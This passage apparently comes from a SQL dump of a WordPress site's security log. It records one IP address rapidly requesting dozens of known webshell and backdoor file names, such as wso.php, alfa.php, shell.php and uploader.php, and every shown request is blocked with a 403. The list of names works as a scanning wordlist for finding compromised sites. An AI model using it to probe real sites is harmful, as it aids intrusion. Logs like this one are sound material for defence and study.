Safari\\/537.36\"}','IJQzrjZvSo8AF3auTqBc6LwG',0,1674925156.7996,222,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QzohLnGfvD3PiCuWMAb08c9w',0,1674925157.4784,179,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dsALfV7uM5mTkPFZB2vr4gU1',0,1674925158.0743,195,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4uJFshx8tqlXEPvSZ62gHkQO',0,1674925158.6892,190,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','I1dhmGer0PaQKWTVZkfFBzij',0,1674925159.3164,166,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','duX2fKz8s6WZUGh1lC3M7ABo',0,1674925159.9117,184,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ipDO9nkGYKIdlMe8ArSzZC3c',0,1674925161.2134,174,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Gu5CVXbOkKAaFLr384t0UNiW',0,1674925161.8082,180,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','f2HqITyOg3cnF7driQ9PXAMv',0,1674925162.5184,200,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PUqEjwTygstr6AX5N1fShcIF',0,1674925163.1375,187,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WkrnTPpsSC9ltU7QocJjEhGX',0,1674925163.7556,172,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lMG28pYAskgWeFrB3yidwNCJ',0,1674925164.3427,182,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2N4TDeG5JRCIBghd0ZnAuP1E',0,1674925164.9569,185,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bVg7tiljvoDE5Rn1fQGeYZF3',0,1674925165.5672,163,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8dfWz9UNIa35xZSp4ilcmbXA',0,1674925166.1551,194,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TyxMKPHbFSAwvrnEdhO10Qf9',0,1674925166.7772,172,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8iLkMozlCn4ZGyN1mdVr7Ejw',0,1674925167.3701,164,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iJ5SZYujFe4g8NbCDQVpsaXO',0,1674925167.9444,160,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lPeS1AdV6Oag4v5TjnKkihxp',0,1674925168.7889,170,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w2gFmBAHuZcjb8Yn5hOJqtks',0,1674925169.3840,165,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/dr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VzRkDXZjBa2HpWx7uthPKQYv',0,1674925169.9708,169,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DAsF0heEG2rRipgz81cTQ5xB',0,1674925170.5564,195,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4S37mPQpNoqUWcXVaD1EkC0R',0,1674925171.1633,167,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4KI5VfLuejir6X3FQaUhHcpo',0,1674925171.7475,209,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','j5yKuqtGfxeb6X819Ovhcsd2',0,1674925172.3945,184,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2yTQgYe1olHL7IWSs6bP3kij',0,1674925173.0181,191,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','h0wTR8oOVlvuI3XqAWKe6GPn',0,1674925173.6303,168,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rzQjF2N5MheqoWKpLbtJGx8m',0,1674925174.2210,170,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cCRsBw72WzXQyDoi5PnvHNgl',0,1674925174.8144,192,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jaLmF380H9xtVRXfq2WlPCho',0,1674925175.4288,180,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CnEybjLGVoJ6dQ0kM3Fax9Ns',0,1674925177.2249,184,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-content/wp-logins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fnulDhZU5PbwSaXHMNsIOx28',0,1674925177.8272,163,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ShwtX1K8NTfnyQY9OEzBRWcx',0,1674925178.4123,187,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ItgxNWmvYLd1QMHarJ2zeSKl',0,1674925179.0288,199,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xvb0IKcCsQFA7gdkrfHPi8ZT',0,1674925179.6501,240,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-content/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pinqgZOGoKeJDXPL3lRMzA5m',0,1674925180.8705,180,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pYjtB4H3I0Z65aVboycufXSG',0,1674925181.4847,188,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0ZDmj1wW4t6AES7yXpPOfKCq',0,1674925182.8008,162,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0J6FsVKCremMWqod1yt8jEYD',0,1674925183.3949,168,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1grJF0iOyhDGNVfpnxb7UL83',0,1674925183.9843,169,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oJAuPyM5zfK1mRiEDOce26nQ',0,1674925184.5767,167,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uRlgv2OTomAMsNtfDQ80G5Ib',0,1674925185.1713,200,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kWb0xnyJupf1vBLUq72wg8Od',0,1674925185.8034,169,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6KYZzn7T10LMsrUHlEADBFNQ',0,1674925186.3930,171,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kCl3yNWd7vhD6xI2QjzEpgcS',0,1674925186.9912,172,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iYSDCrKFunpox8gJh0yLzT2e',0,1674925187.5848,205,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1obY0TFQrtcInq2S3HladPJw',0,1674925188.2523,182,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vltLoVHXsdcDnxCT2wPB76YU',0,1674925188.8730,227,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AOhnXu8pYWoyVHqF0lP6bRzt',0,1674925189.5381,191,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EFmOGlqQLoiasZBtNXgxP6cu',0,1674925190.1662,192,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vQLu3MjVmYytkzGlP8e4CJda',0,1674925190.8007,170,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QBmoOHb6cIwAJZgS3MaUuCNL',0,1674925191.3817,189,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Xvfz89kbOiL2YyRgJK0x4Tre',0,1674925192.0010,167,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LqjSiorkUdZ8AValNpWuQxh1',0,1674925192.5863,176,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BZHitWbUaVNLzlwmAM0Jx187',0,1674925193.2200,170,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uGB57zdsj3ocXMRHZ4QaKn9m',0,1674925193.8475,279,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NgHpijPqET0MdZl5ckuvs6X9',0,1674925194.5867,432,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y9xh6rdNcQe7TanoZMvXOS2l',0,1674925195.4808,200,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3i8ut4AEB7sneoTmDWRwvL9F',0,1674925196.1137,194,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RmeiVhw0WOcvnNLjyHbq6QEf',0,1674925196.7325,193,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1cHOfwpdXl2bIAuZ3rW0MqsF',0,1674925197.9242,158,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','louOUzncCPdZvt3QrSHh7DWy',0,1674925198.5251,195,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GbXjMz14mqitneIHYo2hS7u5',0,1674925199.1433,183,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EeyujCbrHGlps4iDv06gxmWM',0,1674925199.7588,170,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ls9GuWKEmgfFp08D6cnJxQvX',0,1674925200.3497,178,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hzxl6JBp9US8VuvC7Ftg0fQe',0,1674925200.9610,187,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QpEr3P8okZ4qDIRWue1y7XlH',0,1674925201.6250,194,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','41JGdfxpgDa3zbyO7qIlYKBP',0,1674925202.2423,201,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8otY5JV924TpzBIbxeXmvCiS',0,1674925202.8805,172,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iSlIGsyBWQCANYcDpPh0qn8z',0,1674925204.0381,179,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OIYB7WUtbZ8qSQGevow1EaAV',0,1674925204.6354,170,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','a1LjgndWCHGuIlSFmAXqNDZ4',0,1674925205.2323,192,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GPMwZ5x1DdvI7ErVe3FWoh9s',0,1674925205.8777,173,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wrXCt1YyeAjaLqdNOzWgcMPl',0,1674925217.0951,231,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bVaYkPsdNu2RXviE7qf1WTAM',0,1674925218.0160,189,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','A1PiqvZEwo2njHr48mleabsx',0,1674925218.6497,205,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CqPF4AQMxOj0cubdJ5Tm7vrV',0,1674925219.2934,176,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HDJgjWmVaiSc1Mr4ZuzqLO7v',0,1674925219.9320,196,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C5Ng3q2vdE61XUYxr9VozHJp',0,1674925220.5515,230,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EZYxTyDrwoHQNtsMauvmRkpC',0,1674925221.2051,172,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/sh3ll.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 